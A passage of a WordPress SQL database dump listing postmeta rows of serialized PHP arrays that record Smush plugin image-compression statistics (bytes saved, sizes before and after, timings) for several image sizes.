";i:59857;s:10:\"size_after\";i:59857;s:4:\"time\";d:0.11999999999999999555910790149937383830547332763671875;}}}'),(4241,2348,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:1.5437140616832201178709738087491132318973541259765625;s:5:\"bytes\";i:1890;s:11:\"size_before\";i:122432;s:10:\"size_after\";i:120542;s:4:\"time\";d:0.2800000000000000266453525910037569701671600341796875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:0.1600000000000000033306690738754696212708950042724609375;s:5:\"bytes\";i:22;s:11:\"size_before\";i:13497;s:10:\"size_after\";i:13475;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:34165;s:10:\"size_after\";i:34165;s:4:\"time\";d:0.11999999999999999555910790149937383830547332763671875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:30355;s:10:\"size_after\";i:30355;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.20999999999999996447286321199499070644378662109375;s:5:\"bytes\";i:1868;s:11:\"size_before\";i:44415;s:10:\"size_after\";i:42547;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;}}}'),(4242,2347,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:3.008144372180230785573940011090599000453948974609375;s:5:\"bytes\";i:5134;s:11:\"size_before\";i:170670;s:10:\"size_after\";i:165536;s:4:\"time\";d:0.2399999999999999911182158029987476766109466552734375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:16845;s:10:\"size_after\";i:16845;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:45825;s:10:\"size_after\";i:45825;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:43658;s:10:\"size_after\";i:43658;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.980000000000000426325641456060111522674560546875;s:5:\"bytes\";i:5134;s:11:\"size_before\";i:64342;s:10:\"size_after\";i:59208;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;}}}'),(4243,2346,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:0.54097704130202151073802951941615901887416839599609375;s:5:\"bytes\";i:824;s:11:\"size_before\";i:152317;s:10:\"size_after\";i:151493;s:4:\"time\";d:0.25;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:15367;s:10:\"size_after\";i:15367;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:40792;s:10:\"size_after\";i:40792;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:39053;s:10:\"size_after\";i:39053;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:1.439999999999999946709294817992486059665679931640625;s:5:\"bytes\";i:824;s:11:\"size_before\";i:57105;s:10:\"size_after\";i:56281;s:4:\"time\";d:0.1000000000000000055511151231257827021181583404541015625;}}}'),(4244,2345,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:210264;s:10:\"size_after\";i:210264;s:4:\"time\";d:0.2600000000000000088817841970012523233890533447265625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:20895;s:10:\"size_after\";i:20895;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:57008;s:10:\"size_after\";i:57008;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:51754;s:10:\"size_after\";i:51754;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:80607;s:10:\"size_after\";i:80607;s:4:\"time\";d:0.0899999999999999966693309261245303787291049957275390625;}}}'),(4245,2341,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:14.74864977149979239356980542652308940887451171875;s:5:\"bytes\";i:2485;s:11:\"size_before\";i:16849;s:10:\"size_after\";i:14364;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.019999999999999573674358543939888477325439453125;s:5:\"bytes\";i:252;s:11:\"size_before\";i:2287;s:10:\"size_after\";i:2035;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:15.8800000000000007815970093361102044582366943359375;s:5:\"bytes\";i:800;s:11:\"size_before\";i:5039;s:10:\"size_after\";i:4239;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:15.269999999999999573674358543939888477325439453125;s:5:\"bytes\";i:447;s:11:\"size_before\";i:2927;s:10:\"size_after\";i:2480;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.949999999999999289457264239899814128875732421875;s:5:\"bytes\";i:986;s:11:\"size_before\";i:6596;s:10:\"size_after\";i:5610;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4246,2340,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:13.8254774612565114466633531264960765838623046875;s:5:\"bytes\";i:2150;s:11:\"size_before\";i:15551;s:10:\"size_after\";i:13401;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.519999999999999573674358543939888477325439453125;s:5:\"bytes\";i:224;s:11:\"size_before\";i:2129;s:10:\"size_after\";i:1905;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:15.480000000000000426325641456060111522674560546875;s:5:\"bytes\";i:694;s:11:\"size_before\";i:4482;s:10:\"size_after\";i:3788;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.339999999999999857891452847979962825775146484375;s:5:\"bytes\";i:365;s:11:\"size_before\";i:3219;s:10:\"size_after\";i:2854;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:15.1500000000000003552713678800500929355621337890625;s:5:\"bytes\";i:867;s:11:\"size_before\";i:5721;s:10:\"size_after\";i:4854;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4247,2339,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:11.65146909827760879352354095317423343658447265625;s:5:\"bytes\";i:2990;s:11:\"size_before\";i:25662;s:10:\"size_after\";i:22672;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.3100000000000004973799150320701301097869873046875;s:5:\"bytes\";i:358;s:11:\"size_before\";i:3471;s:10:\"size_after\";i:3113;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.4000000000000003552713678800500929355621337890625;s:5:\"bytes\";i:935;s:11:\"size_before\";i:7538;s:10:\"size_after\";i:6603;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.5099999999999997868371792719699442386627197265625;s:5:\"bytes\";i:524;s:11:\"size_before\";i:4988;s:10:\"size_after\";i:4464;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.1400000000000005684341886080801486968994140625;s:5:\"bytes\";i:1173;s:11:\"size_before\";i:9665;s:10:\"size_after\";i:8492;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4248,2338,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:9.707816641036547622434227378107607364654541015625;s:5:\"bytes\";i:2967;s:11:\"size_before\";i:30563;s:10:\"size_after\";i:27596;s:4:\"time\";d:0.060000000000000004718447854656915296800434589385986328125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.8699999999999992184029906638897955417633056640625;s:5:\"bytes\";i:372;s:11:\"size_before\";i:3768;s:10:\"size_after\";i:3396;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.42999999999999971578290569595992565155029296875;s:5:\"bytes\";i:971;s:11:\"size_before\";i:8495;s:10:\"size_after\";i:7524;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.410000000000000142108547152020037174224853515625;s:5:\"bytes\";i:502;s:11:\"size_before\";i:6779;s:10:\"size_after\";i:6277;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.7400000000000002131628207280300557613372802734375;s:5:\"bytes\";i:1122;s:11:\"size_before\";i:11521;s:10:\"size_after\";i:10399;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4249,2337,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:11.0130111524163556424582566251046955585479736328125;s:5:\"bytes\";i:2844;s:11:\"size_before\";i:25824;s:10:\"size_after\";i:22980;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.410000000000000142108547152020037174224853515625;s:5:\"bytes\";i:348;s:11:\"size_before\";i:3342;s:10:\"size_after\";i:2994;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.28999999999999914734871708787977695465087890625;s:5:\"bytes\";i:920;s:11:\"size_before\";i:7487;s:10:\"size_after\";i:6567;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.949999999999999289457264239899814128875732421875;s:5:\"bytes\";i:472;s:11:\"size_before\";i:5275;s:10:\"size_after\";i:4803;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.3599999999999994315658113919198513031005859375;s:5:\"bytes\";i:1104;s:11:\"size_before\";i:9720;s:10:\"size_after\";i:8616;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4250,2336,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:11.6586606385984747902284652809612452983856201171875;s:5:\"bytes\";i:2063;s:11:\"size_before\";i:17695;s:10:\"size_after\";i:15632;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.4000000000000003552713678800500929355621337890625;s:5:\"bytes\";i:212;s:11:\"size_before\";i:2524;s:10:\"size_after\";i:2312;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.5099999999999997868371792719699442386627197265625;s:5:\"bytes\";i:639;s:11:\"size_before\";i:5551;s:10:\"size_after\";i:4912;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.21000000000000085265128291212022304534912109375;s:5:\"bytes\";i:386;s:11:\"size_before\";i:3162;s:10:\"size_after\";i:2776;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.78999999999999914734871708787977695465087890625;s:5:\"bytes\";i:826;s:11:\"size_before\";i:6458;s:10:\"size_after\";i:5632;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4251,2335,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:12.8626772172766248303332758951000869274139404296875;s:5:\"bytes\";i:3121;s:11:\"size_before\";i:24264;s:10:\"size_after\";i:21143;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.46000000000000085265128291212022304534912109375;s:5:\"bytes\";i:405;s:11:\"size_before\";i:3010;s:10:\"size_after\";i:2605;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.78999999999999914734871708787977695465087890625;s:5:\"bytes\";i:981;s:11:\"size_before\";i:6635;s:10:\"size_after\";i:5654;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.07000000000000028421709430404007434844970703125;s:5:\"bytes\";i:512;s:11:\"size_before\";i:5645;s:10:\"size_after\";i:5133;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.6300000000000007815970093361102044582366943359375;s:5:\"bytes\";i:1223;s:11:\"size_before\";i:8974;s:10:\"size_after\";i:7751;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4252,2334,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:13.7024697234121308753174162120558321475982666015625;s:5:\"bytes\";i:2591;s:11:\"size_before\";i:18909;s:10:\"size_after\";i:16318;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.449999999999999289457264239899814128875732421875;s:5:\"bytes\";i:262;s:11:\"size_before\";i:2289;s:10:\"size_after\";i:2027;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.4900000000000002131628207280300557613372802734375;s:5:\"bytes\";i:778;s:11:\"size_before\";i:5371;s:10:\"size_after\";i:4593;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.6400000000000005684341886080801486968994140625;s:5:\"bytes\";i:476;s:11:\"size_before\";i:3489;s:10:\"size_after\";i:3013;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.8499999999999996447286321199499070644378662109375;s:5:\"bytes\";i:1075;s:11:\"size_before\";i:7760;s:10:\"size_after\";i:6685;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4253,2332,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:10.83645148934916591088040149770677089691162109375;s:5:\"bytes\";i:3678;s:11:\"size_before\";i:33941;s:10:\"size_after\";i:30263;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.7799999999999993605115378159098327159881591796875;s:5:\"bytes\";i:374;s:11:\"size_before\";i:4260;s:10:\"size_after\";i:3886;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.4700000000000006394884621840901672840118408203125;s:5:\"bytes\";i:1086;s:11:\"size_before\";i:10369;s:10:\"size_after\";i:9283;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.4700000000000006394884621840901672840118408203125;s:5:\"bytes\";i:738;s:11:\"size_before\";i:6434;s:10:\"size_after\";i:5696;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.4900000000000002131628207280300557613372802734375;s:5:\"bytes\";i:1480;s:11:\"size_before\";i:12878;s:10:\"size_after\";i:11398;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4254,2331,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:13.831471609313947368491426459513604640960693359375;s:5:\"bytes\";i:9522;s:11:\"size_before\";i:68843;s:10:\"size_after\";i:59321;s:4:\"time\";d:0.480000000000000037747582837255322374403476715087890625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:18.57000000000000028421709430404007434844970703125;s:5:\"bytes\";i:1752;s:11:\"size_before\";i:9433;s:10:\"size_after\";i:7681;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:18.1400000000000005684341886080801486968994140625;s:5:\"bytes\";i:5067;s:11:\"size_before\";i:27928;s:10:\"size_after\";i:22861;s:4:\"time\";d:0.1700000000000000122124532708767219446599483489990234375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:18.510000000000001563194018672220408916473388671875;s:5:\"bytes\";i:2703;s:11:\"size_before\";i:14605;s:10:\"size_after\";i:11902;s:4:\"time\";d:0.11000000000000000055511151231257827021181583404541015625;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:16877;s:10:\"size_after\";i:16877;s:4:\"time\";d:0.14000000000000001332267629550187848508358001708984375;}}}'),(4255,2330,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:21.053009109819956989895217702724039554595947265625;s:5:\"bytes\";i:11740;s:11:\"size_before\";i:55764;s:10:\"size_after\";i:44024;s:4:\"time\";d:0.09999999999999999167332731531132594682276248931884765625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.480000000000000426325641456060111522674560546875;s:5:\"bytes\";i:426;s:11:\"size_before\";i:2942;s:10:\"size_after\";i:2516;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:16.839999999999999857891452847979962825775146484375;s:5:\"bytes\";i:1090;s:11:\"size_before\";i:6474;s:10:\"size_after\";i:5384;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:23.379999999999999005240169935859739780426025390625;s:5:\"bytes\";i:5530;s:11:\"size_before\";i:23656;s:10:\"size_after\";i:18126;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:16.8900000000000005684341886080801486968994140625;s:5:\"bytes\";i:596;s:11:\"size_before\";i:3529;s:10:\"size_after\";i:2933;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:19.839999999999999857891452847979962825775146484375;s:5:\"bytes\";i:1496;s:11:\"size_before\";i:7539;s:10:\"size_after\";i:6043;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:22.379999999999999005240169935859739780426025390625;s:5:\"bytes\";i:2602;s:11:\"size_before\";i:11624;s:10:\"size_after\";i:9022;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4256,2329,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:18.478483606557379204105018288828432559967041015625;s:5:\"bytes\";i:3607;s:11:\"size_before\";i:19520;s:10:\"size_after\";i:15913;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:16.82000000000000028421709430404007434844970703125;s:5:\"bytes\";i:480;s:11:\"size_before\";i:2853;s:10:\"size_after\";i:2373;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:18.050000000000000710542735760100185871124267578125;s:5:\"bytes\";i:1073;s:11:\"size_before\";i:5946;s:10:\"size_after\";i:4873;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:15.660000000000000142108547152020037174224853515625;s:5:\"bytes\";i:542;s:11:\"size_before\";i:3460;s:10:\"size_after\";i:2918;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:20.82000000000000028421709430404007434844970703125;s:5:\"bytes\";i:1512;s:11:\"size_before\";i:7261;s:10:\"size_after\";i:5749;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4257,2322,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:175647;s:10:\"size_after\";i:175647;s:4:\"time\";d:0.11999999999999999555910790149937383830547332763671875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:3:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:34554;s:10:\"size_after\";i:34554;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:76058;s:10:\"size_after\";i:76058;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:65035;s:10:\"size_after\";i:65035;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}}}'),(4258,2321,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:328794;s:10:\"size_after\";i:328794;s:4:\"time\";d:0.309999999999999997779553950749686919152736663818359375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:30141;s:10:\"size_after\";i:30141;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:67051;s:10:\"size_after\";i:67051;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:59332;s:10:\"size_after\";i:59332;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:172270;s:10:\"size_after\";i:172270;s:4:\"time\";d:0.1499999999999999944488848768742172978818416595458984375;}}}'),(4259,2320,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:354356;s:10:\"size_after\";i:354356;s:4:\"time\";d:0.29000000000000003552713678800500929355621337890625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:32128;s:10:\"size_after\";i:32128;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:72850;s:10:\"size_after\";i:72850;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:59522;s:10:\"size_after\";i:59522;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:189856;s:10:\"size_after\";i:189856;s:4:\"time\";d:0.14000000000000001332267629550187848508358001708984375;}}}'),(4260,2319,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:325129;s:10:\"size_after\";i:325129;s:4:\"time\";d:0.29000000000000003552713678800500929355621337890625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:28458;